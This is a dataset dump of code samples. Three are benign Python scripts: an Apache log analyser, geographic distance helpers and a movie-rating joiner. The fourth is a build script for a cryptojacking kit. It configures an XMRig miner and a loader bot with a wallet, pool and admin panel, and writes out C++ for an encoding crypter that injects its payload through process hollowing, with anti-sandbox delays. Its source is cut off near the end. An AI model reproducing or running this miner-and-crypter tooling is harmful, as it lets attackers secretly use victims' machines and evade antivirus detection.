code
stringlengths 13
1.2M
| order_type
stringclasses 1
value | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
#!/usr/bin/python
# coding:utf-8
#
#这个脚本主要是对apache日志文件的处理分析,过滤出需要的信息
#处理后得到的数据是: 主机IP:192.168.14.44 访问流量:814 K
#使用说明 python 脚本名 文件名; eg:python python.analysis.apachelog.py access.log
#
# by wangdd 2016/02/02
#
import os
import re
import sys
import shelve
#re 模块,利用re模块对apahce日志进行分析
#通过 re.match(……) 和 re.compile(……).match返回
# 该对象有如下方法和属性:
# 方法:
# group( [group1, ...])
# groups( [default])
# groupdict( [default])
# start( [group])
# end( [group])
#
# apache 日志格式: 192.168.47.82 - - [17/Dec/2014:16:41:03 +0800] "GET /application/account/loginIndex.htm HTTP/1.1" 200 56273
#
#基本思路是,利用re模块进行正则匹配,过滤出对应IP的访问字节数,然后把数据保存到apache_log.db数据库中,最后进行数据的格式
log_line_re = re.compile(r'''(?P<remote_host>^\d{1,3}\.(\d{1,3}\.){2}\d{1,3})
\s+
(?P<log_name>\S+)
\s+
(?P<login_user>\S+)
\s+
(?P<time>\[.*\])
\s+
".*"
\s+
(?P<status>\d+)
\s+
(?P<bytes_sent>-|\d+)
''',re.X)
#利用正则表达过滤出需要的数据,返回一个字典类型的数据
def logline(line):
m = log_line_re.search(line)
if m:
groupdict = m.groupdict()
if groupdict['bytes_sent'] == '-':
groupdict['bytes_sent'] = '0'
return groupdict
else:
return {'remote_host':None,'status':None,'bytes_sent':"0",}
#从获取的字典中得到需要的数据
def log_report(logfile):
report_dict ={}
for line in logfile:
line_dict = logline(line)
try:
bytes_sent = int(line_dict['bytes_sent'])
except ValueError:
continue
report_dict.setdefault(line_dict['remote_host'],[]).append(bytes_sent)
for k,v in report_dict.iteritems():
sum = 0
if k != None:
for data in v:
sum = sum +data
print '主机IP:%s\t 访问流量:%s K' % (k,sum/1024)
#这个函数是把处理后的数据保存到data.db文件中,利用了shelv 模块
def store_data(file):
shelv_file = shelve.open('apache_log.db')
if not os.path.isfile('shelv_file'):
for line in file:
d_line = logline(line)
shelv_file[d_line['remote_host']] = \
shelv_file.setdefault(d_line['remote_host'],0) + \
int (d_line['bytes_sent'])
data_file.close()
shelv_file.close()
if __name__ == '__main__':
if not len(sys.argv) >1:
print __doc__
sys.exit(1)
infile_name = sys.argv[1]
try:
infile = open(infile_name,'r')
except IOError:
print "please input some file"
print __doc__
sys.exit(1)
log_report(infile)
store_data(infile)
infile.close()
#--------------------------------------------------------------------
|
normal
|
{
"blob_id": "3240a7fb9fbd5cd84165e68f8406e0a146c2b6b6",
"index": 1454,
"step-1": "#!/usr/bin/python\n# coding:utf-8\n#\n#这个脚本主要是对apache日志文件的处理分析,过滤出需要的信息\n#处理后得到的数据是:\t主机IP:192.168.14.44 访问流量:814 K\n#使用说明 python 脚本名 文件名; eg:python python.analysis.apachelog.py access.log\n#\n#\tby wangdd 2016/02/02\n#\nimport os\nimport re\nimport sys\nimport shelve\n\n#re 模块,利用re模块对apahce日志进行分析\n#通过 re.match(……) 和 re.compile(……).match返回\n# 该对象有如下方法和属性:\n# 方法:\n# group( [group1, ...])\n# groups( [default])\n# groupdict( [default])\n# start( [group])\n# end( [group]) \n#\n# apache 日志格式: 192.168.47.82 - - [17/Dec/2014:16:41:03 +0800] \"GET /application/account/loginIndex.htm HTTP/1.1\" 200 56273\n#\n#基本思路是,利用re模块进行正则匹配,过滤出对应IP的访问字节数,然后把数据保存到apache_log.db数据库中,最后进行数据的格式\n\nlog_line_re = re.compile(r'''(?P<remote_host>^\\d{1,3}\\.(\\d{1,3}\\.){2}\\d{1,3})\n\t\t\t \\s+\n\t\t\t (?P<log_name>\\S+)\n\t\t\t \\s+\n\t\t\t (?P<login_user>\\S+)\n\t\t\t \\s+\n\t\t\t (?P<time>\\[.*\\])\n\t\t \\s+\n \t\t\t \".*\"\n\t\t\t \\s+\n\t\t\t (?P<status>\\d+)\n\t\t\t \\s+\n\t\t\t (?P<bytes_sent>-|\\d+)\n\t\t\t''',re.X)\n#利用正则表达过滤出需要的数据,返回一个字典类型的数据\ndef logline(line):\n m = log_line_re.search(line)\n if m:\n\tgroupdict = m.groupdict()\n\tif groupdict['bytes_sent'] == '-':\n\t\tgroupdict['bytes_sent'] = '0'\n\treturn groupdict\n else:\n\treturn {'remote_host':None,'status':None,'bytes_sent':\"0\",}\n#从获取的字典中得到需要的数据\ndef log_report(logfile):\n report_dict ={}\n for line in logfile:\n\tline_dict = logline(line)\n\ttry:\n\t\tbytes_sent = int(line_dict['bytes_sent'])\n\texcept ValueError:\n\t\tcontinue\n\treport_dict.setdefault(line_dict['remote_host'],[]).append(bytes_sent)\n for k,v in report_dict.iteritems():\n\tsum = 0\n\tif k != None:\n\t\tfor data in v:\n\t\t\tsum = sum +data\n \t\tprint '主机IP:%s\\t 访问流量:%s K' % (k,sum/1024)\n\n#这个函数是把处理后的数据保存到data.db文件中,利用了shelv 模块\ndef store_data(file):\n shelv_file = shelve.open('apache_log.db')\n if not os.path.isfile('shelv_file'):\n \tfor line in file:\n\t\td_line = logline(line)\n \tshelv_file[d_line['remote_host']] = \\\n \tshelv_file.setdefault(d_line['remote_host'],0) + \\\n \tint (d_line['bytes_sent'])\n\t\tdata_file.close()\n\t\tshelv_file.close() \n\nif __name__ == '__main__':\n if not len(sys.argv) >1:\n\tprint __doc__\n\tsys.exit(1)\n infile_name = sys.argv[1]\n try:\n\tinfile = open(infile_name,'r')\n except IOError:\n\tprint \"please input some file\"\n\tprint __doc__\n\tsys.exit(1)\n log_report(infile)\n store_data(infile)\n infile.close()\n\n#--------------------------------------------------------------------\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import math
def Distance(t1, t2):
RADIUS = 6371000. # earth's mean radius in km
p1 = [0, 0]
p2 = [0, 0]
p1[0] = t1[0] * math.pi / 180.
p1[1] = t1[1] * math.pi / 180.
p2[0] = t2[0] * math.pi / 180.
p2[1] = t2[1] * math.pi / 180.
d_lat = (p2[0] - p1[0])
d_lon = (p2[1] - p1[1])
a = math.sin(d_lat / 2) * math.sin(d_lat / 2) + math.cos(
p1[0]) * math.cos(p2[0]) * math.sin(d_lon / 2) * math.sin(d_lon / 2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = RADIUS * c
return d
def tile_number(lon_deg, lat_deg, zoom):
n = 2.0 ** zoom
xtile = int((lon_deg + 180.0) / 360.0 * n)
ytile = int((lat_deg + 90.0) / 180.0 * n)
return (xtile, ytile)
|
normal
|
{
"blob_id": "f3f5b14917c89c5bc2866dd56e212bd3ec8af1cd",
"index": 4841,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef tile_number(lon_deg, lat_deg, zoom):\n n = 2.0 ** zoom\n xtile = int((lon_deg + 180.0) / 360.0 * n)\n ytile = int((lat_deg + 90.0) / 180.0 * n)\n return xtile, ytile\n",
"step-3": "<mask token>\n\n\ndef Distance(t1, t2):\n RADIUS = 6371000.0\n p1 = [0, 0]\n p2 = [0, 0]\n p1[0] = t1[0] * math.pi / 180.0\n p1[1] = t1[1] * math.pi / 180.0\n p2[0] = t2[0] * math.pi / 180.0\n p2[1] = t2[1] * math.pi / 180.0\n d_lat = p2[0] - p1[0]\n d_lon = p2[1] - p1[1]\n a = math.sin(d_lat / 2) * math.sin(d_lat / 2) + math.cos(p1[0]) * math.cos(\n p2[0]) * math.sin(d_lon / 2) * math.sin(d_lon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = RADIUS * c\n return d\n\n\ndef tile_number(lon_deg, lat_deg, zoom):\n n = 2.0 ** zoom\n xtile = int((lon_deg + 180.0) / 360.0 * n)\n ytile = int((lat_deg + 90.0) / 180.0 * n)\n return xtile, ytile\n",
"step-4": "import math\n\n\ndef Distance(t1, t2):\n RADIUS = 6371000.0\n p1 = [0, 0]\n p2 = [0, 0]\n p1[0] = t1[0] * math.pi / 180.0\n p1[1] = t1[1] * math.pi / 180.0\n p2[0] = t2[0] * math.pi / 180.0\n p2[1] = t2[1] * math.pi / 180.0\n d_lat = p2[0] - p1[0]\n d_lon = p2[1] - p1[1]\n a = math.sin(d_lat / 2) * math.sin(d_lat / 2) + math.cos(p1[0]) * math.cos(\n p2[0]) * math.sin(d_lon / 2) * math.sin(d_lon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = RADIUS * c\n return d\n\n\ndef tile_number(lon_deg, lat_deg, zoom):\n n = 2.0 ** zoom\n xtile = int((lon_deg + 180.0) / 360.0 * n)\n ytile = int((lat_deg + 90.0) / 180.0 * n)\n return xtile, ytile\n",
"step-5": "import math\n\ndef Distance(t1, t2):\n RADIUS = 6371000. # earth's mean radius in km\n p1 = [0, 0]\n p2 = [0, 0]\n p1[0] = t1[0] * math.pi / 180.\n p1[1] = t1[1] * math.pi / 180.\n p2[0] = t2[0] * math.pi / 180.\n p2[1] = t2[1] * math.pi / 180.\n\n d_lat = (p2[0] - p1[0])\n d_lon = (p2[1] - p1[1])\n\n a = math.sin(d_lat / 2) * math.sin(d_lat / 2) + math.cos(\n p1[0]) * math.cos(p2[0]) * math.sin(d_lon / 2) * math.sin(d_lon / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = RADIUS * c\n return d\n\ndef tile_number(lon_deg, lat_deg, zoom):\n n = 2.0 ** zoom\n xtile = int((lon_deg + 180.0) / 360.0 * n)\n ytile = int((lat_deg + 90.0) / 180.0 * n)\n return (xtile, ytile)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import pandas as pd
import numpy as np
import difflib as dl
import sys
def get_close(x):
if len(x) == 0:
return ""
return x[0]
list_file = sys.argv[1]
rating_file = sys.argv[2]
output_file = sys.argv[3]
movie_list = open(list_file).read().splitlines()
movie_data = pd.DataFrame({'movie': movie_list})
rating_data = pd.read_csv(rating_file)
rating_data['rating'] = rating_data['rating'].astype(str).astype(float)
rating_data['counts'] = pd.Series(1, index=rating_data.index)
rating_data = rating_data.groupby(['title'])['counts', 'rating'].sum().reset_index()
rating_data['average_rating'] = pd.Series(rating_data['rating']/rating_data['counts'], index=rating_data.index)
movie_data['closed'] = pd.Series(movie_data['movie'], index=movie_data.index)
movie_data['closed'] = movie_data['closed'].apply(lambda x: dl.get_close_matches(x, rating_data['title'], n=1))
movie_data['closed'] = movie_data['closed'].apply(get_close)
result = movie_data.set_index('closed').join(rating_data.set_index('title')).reset_index()
result['average_rating'] = result['average_rating'].apply(lambda x: round(x, 2))
result = result.drop(['closed', 'rating', 'counts'], axis=1)
result = result.set_index('movie')
result.to_csv(output_file, sep=',', encoding='utf-8')
|
normal
|
{
"blob_id": "7a9515b1f8cc196eb7551137a1418d5a387e7fd3",
"index": 959,
"step-1": "<mask token>\n\n\ndef get_close(x):\n if len(x) == 0:\n return ''\n return x[0]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_close(x):\n if len(x) == 0:\n return ''\n return x[0]\n\n\n<mask token>\nresult.to_csv(output_file, sep=',', encoding='utf-8')\n",
"step-3": "<mask token>\n\n\ndef get_close(x):\n if len(x) == 0:\n return ''\n return x[0]\n\n\nlist_file = sys.argv[1]\nrating_file = sys.argv[2]\noutput_file = sys.argv[3]\nmovie_list = open(list_file).read().splitlines()\nmovie_data = pd.DataFrame({'movie': movie_list})\nrating_data = pd.read_csv(rating_file)\nrating_data['rating'] = rating_data['rating'].astype(str).astype(float)\nrating_data['counts'] = pd.Series(1, index=rating_data.index)\nrating_data = rating_data.groupby(['title'])['counts', 'rating'].sum(\n ).reset_index()\nrating_data['average_rating'] = pd.Series(rating_data['rating'] /\n rating_data['counts'], index=rating_data.index)\nmovie_data['closed'] = pd.Series(movie_data['movie'], index=movie_data.index)\nmovie_data['closed'] = movie_data['closed'].apply(lambda x: dl.\n get_close_matches(x, rating_data['title'], n=1))\nmovie_data['closed'] = movie_data['closed'].apply(get_close)\nresult = movie_data.set_index('closed').join(rating_data.set_index('title')\n ).reset_index()\nresult['average_rating'] = result['average_rating'].apply(lambda x: round(x, 2)\n )\nresult = result.drop(['closed', 'rating', 'counts'], axis=1)\nresult = result.set_index('movie')\nresult.to_csv(output_file, sep=',', encoding='utf-8')\n",
"step-4": "import pandas as pd\nimport numpy as np\nimport difflib as dl\nimport sys\n\n\ndef get_close(x):\n if len(x) == 0:\n return ''\n return x[0]\n\n\nlist_file = sys.argv[1]\nrating_file = sys.argv[2]\noutput_file = sys.argv[3]\nmovie_list = open(list_file).read().splitlines()\nmovie_data = pd.DataFrame({'movie': movie_list})\nrating_data = pd.read_csv(rating_file)\nrating_data['rating'] = rating_data['rating'].astype(str).astype(float)\nrating_data['counts'] = pd.Series(1, index=rating_data.index)\nrating_data = rating_data.groupby(['title'])['counts', 'rating'].sum(\n ).reset_index()\nrating_data['average_rating'] = pd.Series(rating_data['rating'] /\n rating_data['counts'], index=rating_data.index)\nmovie_data['closed'] = pd.Series(movie_data['movie'], index=movie_data.index)\nmovie_data['closed'] = movie_data['closed'].apply(lambda x: dl.\n get_close_matches(x, rating_data['title'], n=1))\nmovie_data['closed'] = movie_data['closed'].apply(get_close)\nresult = movie_data.set_index('closed').join(rating_data.set_index('title')\n ).reset_index()\nresult['average_rating'] = result['average_rating'].apply(lambda x: round(x, 2)\n )\nresult = result.drop(['closed', 'rating', 'counts'], axis=1)\nresult = result.set_index('movie')\nresult.to_csv(output_file, sep=',', encoding='utf-8')\n",
"step-5": "import pandas as pd\nimport numpy as np\nimport difflib as dl\nimport sys\n\ndef get_close(x):\n\tif len(x) == 0:\n\t\treturn \"\"\n\treturn x[0]\n\nlist_file = sys.argv[1]\nrating_file = sys.argv[2]\noutput_file = sys.argv[3]\n\nmovie_list = open(list_file).read().splitlines()\nmovie_data = pd.DataFrame({'movie': movie_list})\nrating_data = pd.read_csv(rating_file)\nrating_data['rating'] = rating_data['rating'].astype(str).astype(float)\nrating_data['counts'] = pd.Series(1, index=rating_data.index)\nrating_data = rating_data.groupby(['title'])['counts', 'rating'].sum().reset_index()\nrating_data['average_rating'] = pd.Series(rating_data['rating']/rating_data['counts'], index=rating_data.index)\n\nmovie_data['closed'] = pd.Series(movie_data['movie'], index=movie_data.index)\nmovie_data['closed'] = movie_data['closed'].apply(lambda x: dl.get_close_matches(x, rating_data['title'], n=1))\nmovie_data['closed'] = movie_data['closed'].apply(get_close)\n\nresult = movie_data.set_index('closed').join(rating_data.set_index('title')).reset_index()\n\nresult['average_rating'] = result['average_rating'].apply(lambda x: round(x, 2))\nresult = result.drop(['closed', 'rating', 'counts'], axis=1)\nresult = result.set_index('movie')\n\nresult.to_csv(output_file, sep=',', encoding='utf-8')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import os, sys, time, random, subprocess
def load_userdata(wallet, pool, ww, logger, adminka):
with open("D:\\msys64\\xmrig-master\\src\\ex.cpp", "r") as f:
file = f.read()
file = file.replace("%u%", wallet)
file = file.replace("%p%", pool)
file = file.replace("%w%", ww)
with open("D:\\msys64\\xmrig-master\\src\\xmrig.cpp", "w") as w:
w.write(file)
with open(os.getcwd()+"\\Bot\\Miner\\ex.cs", "r") as f:
file = f.read()
file = file.replace("%l%", logger)
file = file.replace("%a%", adminka)
with open(os.getcwd()+"\\Bot\\Miner\\Program.cs", "w") as w:
w.write(file)
def writeBytes(key):
with open(os.getcwd()+"\\file.txt", "r") as f:
file = f.read()
with open(os.getcwd()+"\\Miner\\CryptRunPe\\winhost.cpp", "w") as w:
w.write("#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n")
with open("ex.txt") as ex:
w.write(file)
exx = ex.read()
w.write(exx)
def compile(path, file):
os.system("%windir%\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe \""+path+file+".sln\" /p:Configuration=Release")
def compileM(path, file):
os.system("msbuild.exe \""+path+file+".sln\" /p:Configuration=Release")
def compileR(path, file):
os.system("msbuild.exe \""+path+file+".sln\" /p:Configuration=Release /p:Platform=\"WIN32\"")
def xcopy(path, out):
try:
with open(path, "rb") as f:
file = f.read()
with open(out, "wb") as w:
w.write(bytearray(file))
except:
pass
def crypt(name, key):
with open('encoder.cpp', 'w') as w:
txt = '\n\
#include <Windows.h>\n\
#include <winternl.h>\n\
#include <iostream>\n\
#include <string>\n\
#include <fstream>\n\
using namespace std;\n\
int main()\n\
{\n\
FILE * file = fopen("in.exe", "rb");\n\
if (file == NULL) return 0;\n\
fseek(file, 0, SEEK_END);\n\
long int size = ftell(file);\n\
fclose(file);\n\
file = fopen("in.exe", "rb");\n\
unsigned char * in = (unsigned char *)malloc(size);\n\
int bytes_read = fread(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
for (int i = 0; i < size; i++) {\n\
in[i] = in[i] - 0x0%n%;\n\
}\n\
file = fopen("out.exe", "wb");\n\
int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
for (int i = 0; i < size; i++) {\n\
in[i] = in[i] + 0x0%n%;\n\
}\n\
file = fopen("decr.exe", "wb");\n\
bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n\
fclose(file);\n\
return 0;\n\
}\n\
'
txt = txt.replace("%n%", str(key))
w.write(txt)
os.system("g++ -o enc encoder.cpp")
os.system("C:\Python27\python.exe cv.py")
with open('file.txt', 'r') as r:
with open(os.getcwd()+"\\src\\crypter\\crypter.cpp", "w") as w:
txt = '\
#include "stdafx.h"\n\
#include "Crypter.h"\n\
#include <windows.h>\n\
#include <winternl.h>\n\
#pragma comment(lib,"ws2_32.lib")\n\
#pragma comment(lib,"ntdll.lib")\n\
'+ r.read() + '\
int RunPortableExecutable(void* Image) {\n\
IMAGE_DOS_HEADER* DOSHeader;\n\
IMAGE_NT_HEADERS* NtHeader;\n\
IMAGE_SECTION_HEADER* SectionHeader;\n\
PROCESS_INFORMATION PI;\n\
STARTUPINFOA SI;\n\
CONTEXT* CTX;\n\
DWORD* ImageBase;\n\
void* pImageBase;\n\
int count;\n\
char buffer[MAX_PATH];\n\
GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n\
char *CurrentFilePath = buffer;\n\
DOSHeader = PIMAGE_DOS_HEADER(Image);\n\
NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n\
if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n\
ZeroMemory(&PI, sizeof(PI));\n\
ZeroMemory(&SI, sizeof(SI));\n\
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n\
NtUnmapViewOfSection mNtUnmapViewOfSection;\n\
if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n\
CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n\
CTX->ContextFlags = CONTEXT_FULL;\n\
if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n\
ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n\
pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n\
NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n\
WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n\
for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n\
SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n\
WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n\
LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n\
}\n\
WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n\
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n\
SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n\
ResumeThread(PI.hThread);\n\
return 0;\n\
}\n\
}\n\
}\n\
}\n\
int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n\
for (int i = 0; i < 550000; i++)\n\
OutputDebugStringW(L"");\n\
for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n\
unsigned char b = rawData[i] + 0x0%n%;\n\
rawData[i] = b;\n\
}\n\
Sleep(((rand() % 5 + 1) + 5) * 1000);\n\
RunPortableExecutable(rawData);\n\
return 0;\n\
}\
'
txt = txt.replace("%n%", str(key))
w.write(txt)
compileM(os.getcwd()+"\\src\\", "ConsoleApplication1")
xcopy(os.getcwd() + "\\src\\Release\\Crypter.exe", os.getcwd()+"\\"+name+".exe")
key = random.randint(1, 100)
u = sys.argv[1]
w = sys.argv[2]
p = sys.argv[3]
l = sys.argv[4]
a = sys.argv[5]
load_userdata(u, p, w, l, a)
compile(os.getcwd()+"\\Bot\\", "LoaderBot")
xcopy(os.getcwd()+"\\Bot\\Miner\\bin\\Release\\LoaderBot.exe", "Bot.exe")
compileR(os.getcwd()+"\\rig\\", "xmrig")
xcopy(os.getcwd()+"\\rig\\Release\\xmrig.exe", "out.exe")
crypt("test", key)
os.system("C:\Python27\python.exe cv.py")
writeBytes(key)
compileM(os.getcwd()+"\\Miner\\", "winhost")
xcopy(os.getcwd()+"\\Miner\\Release\\winhost.exe", "in.exe")
print(os.getcwd()+"\\enc.exe")
subprocess.call(os.getcwd()+"\\enc.exe")
crypt("winhost", key)
os.system("del file.txt")
os.system("del in.exe")
os.system("del out.exe")
os.system("del decr.exe")
os.system("del enc.exe")
os.system("del test.exe")
|
normal
|
{
"blob_id": "d1254e558217cce88de2f83b87d5c54333f1c677",
"index": 9938,
"step-1": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR 